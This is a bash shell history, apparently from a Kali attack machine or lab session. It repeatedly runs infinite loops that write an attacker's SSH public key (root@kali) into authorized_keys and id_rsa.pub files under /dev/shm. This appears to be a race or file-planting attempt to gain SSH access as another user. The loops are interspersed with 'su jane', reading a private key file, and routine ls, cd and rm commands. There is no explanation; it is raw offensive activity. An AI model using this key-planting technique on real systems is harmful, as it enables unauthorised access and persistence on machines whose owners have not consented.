 1429  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1430  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/authorized_keys > /dev/null; done
 1431  clear
 1432  ls -la 
 1433  cat id_rsa
 1434  rm -r id_rsa
 1435  ls -la 
 1436  clear
 1437  ls -al 
 1438  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/authorized_keys > /dev/null; done
 1439  ls 
 1440  clear
 1441  ls -a 
 1442  ls -la 
 1443  cat authorized_keys 
 1444  clear
 1445  ls -la 
 1446  rm -r authorized_keys 
 1447  rm -r id_rsa.pub 
 1448  clear
 1449  ls -la 
 1450  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/authorized_keys > /dev/null; done
 1451  ls -la 
 1452  clear
 1453  ls -la 
 1454  rm -r authorized_keys 
 1455  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1456  clear
 1457  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1458  clear
 1459  ls -la 
 1460  rm --
 1461  rm -r id_rsa.pub 
 1462  ls -al 
 1463  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1464  clear
 1465  ls -al 
 1466  ls -la 
 1467  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1468  ls -al 
 1469  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub* > /dev/null; done
 1470  cd /dev/shm/
 1471  ls -al 
 1472  cd keys/
 1473  ls 
 1474  touch file.txt
 1475  cd ..
 1476  cd /tmp/
 1477  cd t
 1478  cd test/
 1479  touch file.txt
 1480  cd ..
 1481  touch file.txt
 1482  rm -r 
 1483  rm -r file.txt 
 1484  cd t
 1485  cd test/
 1486  ls -al 
 1487  touch file.txt
 1488  cd /dev/shm/
 1489  ls -la 
 1490  cd keys/
 1491  ls 
 1492  cd..
 1493  clear
 1494  ls -al 
 1495  cd ..
 1496  ls -la 
 1497  rm -r keys/
 1498  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys* > /dev/null; done
 1499  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub* > /dev/null; done
 1500  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub > /dev/null; done
 1501  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys* > /dev/null; done
 1502  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub* > /dev/null; done
 1503  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys* > /dev/null; done
 1504  ls -la 
 1505  cd keys/
 1506  ls -la 
 1507  cat id_rsa.pub\* 
 1508  clear
 1509  ls a- l
 1510  clear
 1511  ls -la 
 1512  cat id_rsa.pub\* 
 1513  cd..
 1514  cd ..
 1515  clear
 1516  ls -la 
 1517  cd l
 1518  cd keys/
 1519  ls -la 
 1520  rm -r id_rsa.pub\* 
 1521  clear
 1522  ls -la 
 1523  cd ..
 1524  ls -a l
 1525  rm -r keys/
 1526  clear
 1527  ls -al 
 1528  ls -la 
 1529  cd ..
 1530  cd shm/
 1531  ls -la 
 1532  su jane
 1533  clear
 1534  ls -]al 
 1535  clear
 1536  ls -la 
 1537  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm* > /dev/null; done
 1538  clear
 1539  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1540  clear
 1541  ls -la 
 1542  rm -r id_rsa.pub 
 1543  clear
 1544  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1545  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/authorized_keys > /dev/null; done
 1546  clear
 1547  ls -la 
 1548  cat id_rsa
 1549  rm -r id_rsa
 1550  ls -la 
 1551  clear
 1552  ls -al 
 1553  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/authorized_keys > /dev/null; done
 1554  ls 
 1555  clear
 1556  ls -a 
 1557  ls -la 
 1558  cat authorized_keys 
 1559  clear
 1560  ls -la 
 1561  rm -r authorized_keys 
 1562  rm -r id_rsa.pub 
 1563  clear
 1564  ls -la 
 1565  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/authorized_keys > /dev/null; done
 1566  ls -la 
 1567  clear
 1568  ls -la 
 1569  rm -r authorized_keys 
 1570  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1571  clear
 1572  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1573  clear
 1574  ls -la 
 1575  rm --
 1576  rm -r id_rsa.pub 
 1577  ls -al 
 1578  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1579  clear
 1580  ls -al 
 1581  ls -la 
